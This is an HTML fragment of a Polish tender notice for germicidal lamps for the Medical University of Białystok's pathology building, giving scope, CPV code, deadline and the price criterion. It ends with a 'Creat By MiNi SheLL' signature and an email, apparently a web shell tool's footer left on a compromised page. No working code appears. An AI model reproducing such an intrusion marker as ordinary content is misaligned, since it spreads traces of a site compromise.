<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Lampy bakteriobójcze - 1 kpl..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: dostawa, wraz z rozładunkiem, wniesieniem, montażem, instalacją, uruchomieniem oraz przeszkoleniem personelu Użytkownika, wyposażenia do budynku Collegium Pathologicum Uniwersytetu Medycznego w Białymstoku t. j.: Lampy bakteriobójcze - 1 kpl.
Szczegółowy opis przedmiotu zamówienia, wymagane parametry oraz wymagania 
dodatkowe i ogólne przedmiotu zamówienia zawiera załącznik Nr 2 (OPIS PRZEDMIOTU ZAMÓWIENIA) stanowiący integralną część SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 31.51.50.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 56.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com